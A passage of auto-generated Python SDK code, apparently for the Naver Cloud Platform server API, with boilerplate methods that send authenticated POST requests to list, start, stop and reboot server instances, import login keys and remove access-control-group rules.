# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getServerInstanceDetail', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetServerInstanceDetailResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_server_instance_list(self, get_server_instance_list_request, **kwargs): # noqa: E501
"""get_server_instance_list # noqa: E501
Query the server instance list  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_server_instance_list(get_server_instance_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetServerInstanceListRequest get_server_instance_list_request: getServerInstanceListRequest (required)
:return: GetServerInstanceListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_server_instance_list_with_http_info(get_server_instance_list_request, **kwargs) # noqa: E501
else:
(data) = self.get_server_instance_list_with_http_info(get_server_instance_list_request, **kwargs) # noqa: E501
return data
def get_server_instance_list_with_http_info(self, get_server_instance_list_request, **kwargs): # noqa: E501
"""get_server_instance_list # noqa: E501
Query the server instance list  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_server_instance_list_with_http_info(get_server_instance_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetServerInstanceListRequest get_server_instance_list_request: getServerInstanceListRequest (required)
:return: GetServerInstanceListResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_server_instance_list_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_server_instance_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_server_instance_list_request' is set
if ('get_server_instance_list_request' not in params or
params['get_server_instance_list_request'] is None):
raise ValueError("Missing the required parameter `get_server_instance_list_request` when calling `get_server_instance_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_server_instance_list_request' in params:
body_params = params['get_server_instance_list_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getServerInstanceList', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetServerInstanceListResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_server_product_list(self, get_server_product_list_request, **kwargs): # noqa: E501
"""get_server_product_list # noqa: E501
Query the server product list  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_server_product_list(get_server_product_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetServerProductListRequest get_server_product_list_request: getServerProductListRequest (required)
:return: GetServerProductListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_server_product_list_with_http_info(get_server_product_list_request, **kwargs) # noqa: E501
else:
(data) = self.get_server_product_list_with_http_info(get_server_product_list_request, **kwargs) # noqa: E501
return data
def get_server_product_list_with_http_info(self, get_server_product_list_request, **kwargs): # noqa: E501
"""get_server_product_list # noqa: E501
Query the server product list  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_server_product_list_with_http_info(get_server_product_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetServerProductListRequest get_server_product_list_request: getServerProductListRequest (required)
:return: GetServerProductListResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_server_product_list_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_server_product_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_server_product_list_request' is set
if ('get_server_product_list_request' not in params or
params['get_server_product_list_request'] is None):
raise ValueError("Missing the required parameter `get_server_product_list_request` when calling `get_server_product_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_server_product_list_request' in params:
body_params = params['get_server_product_list_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getServerProductList', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetServerProductListResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_zone_list(self, get_zone_list_request, **kwargs): # noqa: E501
"""get_zone_list # noqa: E501
Query the ZONE list  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_zone_list(get_zone_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetZoneListRequest get_zone_list_request: getZoneListRequest (required)
:return: GetZoneListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_zone_list_with_http_info(get_zone_list_request, **kwargs) # noqa: E501
else:
(data) = self.get_zone_list_with_http_info(get_zone_list_request, **kwargs) # noqa: E501
return data
def get_zone_list_with_http_info(self, get_zone_list_request, **kwargs): # noqa: E501
"""get_zone_list # noqa: E501
Query the ZONE list  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_zone_list_with_http_info(get_zone_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetZoneListRequest get_zone_list_request: getZoneListRequest (required)
:return: GetZoneListResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_zone_list_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_zone_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_zone_list_request' is set
if ('get_zone_list_request' not in params or
params['get_zone_list_request'] is None):
raise ValueError("Missing the required parameter `get_zone_list_request` when calling `get_zone_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_zone_list_request' in params:
body_params = params['get_zone_list_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getZoneList', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetZoneListResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def import_login_key(self, import_login_key_request, **kwargs): # noqa: E501
"""import_login_key # noqa: E501
Import a user-created login key  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.import_login_key(import_login_key_request, async=True)
>>> result = thread.get()
:param async bool
:param ImportLoginKeyRequest import_login_key_request: importLoginKeyRequest (required)
:return: ImportLoginKeyResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.import_login_key_with_http_info(import_login_key_request, **kwargs) # noqa: E501
else:
(data) = self.import_login_key_with_http_info(import_login_key_request, **kwargs) # noqa: E501
return data
def import_login_key_with_http_info(self, import_login_key_request, **kwargs): # noqa: E501
"""import_login_key # noqa: E501
Import a user-created login key  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.import_login_key_with_http_info(import_login_key_request, async=True)
>>> result = thread.get()
:param async bool
:param ImportLoginKeyRequest import_login_key_request: importLoginKeyRequest (required)
:return: ImportLoginKeyResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['import_login_key_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method import_login_key" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'import_login_key_request' is set
if ('import_login_key_request' not in params or
params['import_login_key_request'] is None):
raise ValueError("Missing the required parameter `import_login_key_request` when calling `import_login_key`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'import_login_key_request' in params:
body_params = params['import_login_key_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/importLoginKey', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ImportLoginKeyResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def reboot_server_instances(self, reboot_server_instances_request, **kwargs): # noqa: E501
"""reboot_server_instances # noqa: E501
Reboot server instances  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.reboot_server_instances(reboot_server_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param RebootServerInstancesRequest reboot_server_instances_request: rebootServerInstancesRequest (required)
:return: RebootServerInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.reboot_server_instances_with_http_info(reboot_server_instances_request, **kwargs) # noqa: E501
else:
(data) = self.reboot_server_instances_with_http_info(reboot_server_instances_request, **kwargs) # noqa: E501
return data
def reboot_server_instances_with_http_info(self, reboot_server_instances_request, **kwargs): # noqa: E501
"""reboot_server_instances # noqa: E501
Reboot server instances  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.reboot_server_instances_with_http_info(reboot_server_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param RebootServerInstancesRequest reboot_server_instances_request: rebootServerInstancesRequest (required)
:return: RebootServerInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['reboot_server_instances_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method reboot_server_instances" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'reboot_server_instances_request' is set
if ('reboot_server_instances_request' not in params or
params['reboot_server_instances_request'] is None):
raise ValueError("Missing the required parameter `reboot_server_instances_request` when calling `reboot_server_instances`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'reboot_server_instances_request' in params:
body_params = params['reboot_server_instances_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/rebootServerInstances', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RebootServerInstancesResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def remove_access_control_group_inbound_rule(self, remove_access_control_group_inbound_rule_request, **kwargs): # noqa: E501
"""remove_access_control_group_inbound_rule # noqa: E501
Delete an ACG inbound rule  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.remove_access_control_group_inbound_rule(remove_access_control_group_inbound_rule_request, async=True)
>>> result = thread.get()
:param async bool
:param RemoveAccessControlGroupInboundRuleRequest remove_access_control_group_inbound_rule_request: removeAccessControlGroupInboundRuleRequest (required)
:return: RemoveAccessControlGroupInboundRuleResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.remove_access_control_group_inbound_rule_with_http_info(remove_access_control_group_inbound_rule_request, **kwargs) # noqa: E501
else:
(data) = self.remove_access_control_group_inbound_rule_with_http_info(remove_access_control_group_inbound_rule_request, **kwargs) # noqa: E501
return data
def remove_access_control_group_inbound_rule_with_http_info(self, remove_access_control_group_inbound_rule_request, **kwargs): # noqa: E501
"""remove_access_control_group_inbound_rule # noqa: E501
Delete an ACG inbound rule  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.remove_access_control_group_inbound_rule_with_http_info(remove_access_control_group_inbound_rule_request, async=True)
>>> result = thread.get()
:param async bool
:param RemoveAccessControlGroupInboundRuleRequest remove_access_control_group_inbound_rule_request: removeAccessControlGroupInboundRuleRequest (required)
:return: RemoveAccessControlGroupInboundRuleResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['remove_access_control_group_inbound_rule_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method remove_access_control_group_inbound_rule" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'remove_access_control_group_inbound_rule_request' is set
if ('remove_access_control_group_inbound_rule_request' not in params or
params['remove_access_control_group_inbound_rule_request'] is None):
raise ValueError("Missing the required parameter `remove_access_control_group_inbound_rule_request` when calling `remove_access_control_group_inbound_rule`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'remove_access_control_group_inbound_rule_request' in params:
body_params = params['remove_access_control_group_inbound_rule_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/removeAccessControlGroupInboundRule', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RemoveAccessControlGroupInboundRuleResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def remove_access_control_group_outbound_rule(self, remove_access_control_group_outbound_rule_request, **kwargs): # noqa: E501
"""remove_access_control_group_outbound_rule # noqa: E501
Delete an ACG outbound rule  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.remove_access_control_group_outbound_rule(remove_access_control_group_outbound_rule_request, async=True)
>>> result = thread.get()
:param async bool
:param RemoveAccessControlGroupOutboundRuleRequest remove_access_control_group_outbound_rule_request: removeAccessControlGroupOutboundRuleRequest (required)
:return: RemoveAccessControlGroupOutboundRuleResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.remove_access_control_group_outbound_rule_with_http_info(remove_access_control_group_outbound_rule_request, **kwargs) # noqa: E501
else:
(data) = self.remove_access_control_group_outbound_rule_with_http_info(remove_access_control_group_outbound_rule_request, **kwargs) # noqa: E501
return data
def remove_access_control_group_outbound_rule_with_http_info(self, remove_access_control_group_outbound_rule_request, **kwargs): # noqa: E501
"""remove_access_control_group_outbound_rule # noqa: E501
Delete an ACG outbound rule  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.remove_access_control_group_outbound_rule_with_http_info(remove_access_control_group_outbound_rule_request, async=True)
>>> result = thread.get()
:param async bool
:param RemoveAccessControlGroupOutboundRuleRequest remove_access_control_group_outbound_rule_request: removeAccessControlGroupOutboundRuleRequest (required)
:return: RemoveAccessControlGroupOutboundRuleResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['remove_access_control_group_outbound_rule_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method remove_access_control_group_outbound_rule" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'remove_access_control_group_outbound_rule_request' is set
if ('remove_access_control_group_outbound_rule_request' not in params or
params['remove_access_control_group_outbound_rule_request'] is None):
raise ValueError("Missing the required parameter `remove_access_control_group_outbound_rule_request` when calling `remove_access_control_group_outbound_rule`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'remove_access_control_group_outbound_rule_request' in params:
body_params = params['remove_access_control_group_outbound_rule_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/removeAccessControlGroupOutboundRule', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RemoveAccessControlGroupOutboundRuleResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def remove_network_interface_access_control_group(self, remove_network_interface_access_control_group_request, **kwargs): # noqa: E501
"""remove_network_interface_access_control_group # noqa: E501
Remove an ACG from a network interface  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.remove_network_interface_access_control_group(remove_network_interface_access_control_group_request, async=True)
>>> result = thread.get()
:param async bool
:param RemoveNetworkInterfaceAccessControlGroupRequest remove_network_interface_access_control_group_request: removeNetworkInterfaceAccessControlGroupRequest (required)
:return: RemoveNetworkInterfaceAccessControlGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.remove_network_interface_access_control_group_with_http_info(remove_network_interface_access_control_group_request, **kwargs) # noqa: E501
else:
(data) = self.remove_network_interface_access_control_group_with_http_info(remove_network_interface_access_control_group_request, **kwargs) # noqa: E501
return data
def remove_network_interface_access_control_group_with_http_info(self, remove_network_interface_access_control_group_request, **kwargs): # noqa: E501
"""remove_network_interface_access_control_group # noqa: E501
Remove an ACG from a network interface  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.remove_network_interface_access_control_group_with_http_info(remove_network_interface_access_control_group_request, async=True)
>>> result = thread.get()
:param async bool
:param RemoveNetworkInterfaceAccessControlGroupRequest remove_network_interface_access_control_group_request: removeNetworkInterfaceAccessControlGroupRequest (required)
:return: RemoveNetworkInterfaceAccessControlGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['remove_network_interface_access_control_group_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method remove_network_interface_access_control_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'remove_network_interface_access_control_group_request' is set
if ('remove_network_interface_access_control_group_request' not in params or
params['remove_network_interface_access_control_group_request'] is None):
raise ValueError("Missing the required parameter `remove_network_interface_access_control_group_request` when calling `remove_network_interface_access_control_group`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'remove_network_interface_access_control_group_request' in params:
body_params = params['remove_network_interface_access_control_group_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/removeNetworkInterfaceAccessControlGroup', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RemoveNetworkInterfaceAccessControlGroupResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def remove_placement_group_server_instance(self, remove_placement_group_server_instance_request, **kwargs): # noqa: E501
"""remove_placement_group_server_instance # noqa: E501
Remove a server instance from a physical placement group  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.remove_placement_group_server_instance(remove_placement_group_server_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param RemovePlacementGroupServerInstanceRequest remove_placement_group_server_instance_request: removePlacementGroupServerInstanceRequest (required)
:return: RemovePlacementGroupServerInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.remove_placement_group_server_instance_with_http_info(remove_placement_group_server_instance_request, **kwargs) # noqa: E501
else:
(data) = self.remove_placement_group_server_instance_with_http_info(remove_placement_group_server_instance_request, **kwargs) # noqa: E501
return data
def remove_placement_group_server_instance_with_http_info(self, remove_placement_group_server_instance_request, **kwargs): # noqa: E501
"""remove_placement_group_server_instance # noqa: E501
Remove a server instance from a physical placement group  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.remove_placement_group_server_instance_with_http_info(remove_placement_group_server_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param RemovePlacementGroupServerInstanceRequest remove_placement_group_server_instance_request: removePlacementGroupServerInstanceRequest (required)
:return: RemovePlacementGroupServerInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['remove_placement_group_server_instance_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method remove_placement_group_server_instance" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'remove_placement_group_server_instance_request' is set
if ('remove_placement_group_server_instance_request' not in params or
params['remove_placement_group_server_instance_request'] is None):
raise ValueError("Missing the required parameter `remove_placement_group_server_instance_request` when calling `remove_placement_group_server_instance`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'remove_placement_group_server_instance_request' in params:
body_params = params['remove_placement_group_server_instance_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/removePlacementGroupServerInstance', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RemovePlacementGroupServerInstanceResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def start_server_instances(self, start_server_instances_request, **kwargs): # noqa: E501
"""start_server_instances # noqa: E501
Start server instances  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.start_server_instances(start_server_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param StartServerInstancesRequest start_server_instances_request: startServerInstancesRequest (required)
:return: StartServerInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.start_server_instances_with_http_info(start_server_instances_request, **kwargs) # noqa: E501
else:
(data) = self.start_server_instances_with_http_info(start_server_instances_request, **kwargs) # noqa: E501
return data
def start_server_instances_with_http_info(self, start_server_instances_request, **kwargs): # noqa: E501
"""start_server_instances # noqa: E501
Start server instances  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.start_server_instances_with_http_info(start_server_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param StartServerInstancesRequest start_server_instances_request: startServerInstancesRequest (required)
:return: StartServerInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['start_server_instances_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method start_server_instances" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'start_server_instances_request' is set
if ('start_server_instances_request' not in params or
params['start_server_instances_request'] is None):
raise ValueError("Missing the required parameter `start_server_instances_request` when calling `start_server_instances`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'start_server_instances_request' in params:
body_params = params['start_server_instances_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/startServerInstances', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='StartServerInstancesResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def stop_server_instances(self, stop_server_instances_request, **kwargs): # noqa: E501
"""stop_server_instances # noqa: E501
Stop server instances  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.stop_server_instances(stop_server_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param StopServerInstancesRequest stop_server_instances_request: stopServerInstancesRequest (required)
:return: StopServerInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.stop_server_instances_with_http_info(stop_server_instances_request, **kwargs) # noqa: E501
else:
(data) = self.stop_server_instances_with_http_info(stop_server_instances_request, **kwargs) # noqa: E501
return data
def stop_server_instances_with_http_info(self, stop_server_instances_request, **kwargs): # noqa: E501
"""stop_server_instances # noqa: E501
Stop server instances  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.stop_server_instances_with_http_info(stop_server_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param StopServerInstancesRequest stop_server_instances_request: stopServerInstancesRequest (required)
:return: StopServerInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['stop_server_instances_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method stop_server_instances" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'stop_server_instances_request' is set
if ('stop_server_instances_request' not in params or
params['stop_server_instances_request'] is None):
raise ValueError("Missing the required parameter `stop_server_instances_request` when calling `stop_server_instances`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'stop_server_instances_request' in params:
body_params = params['stop_server_instances_request']
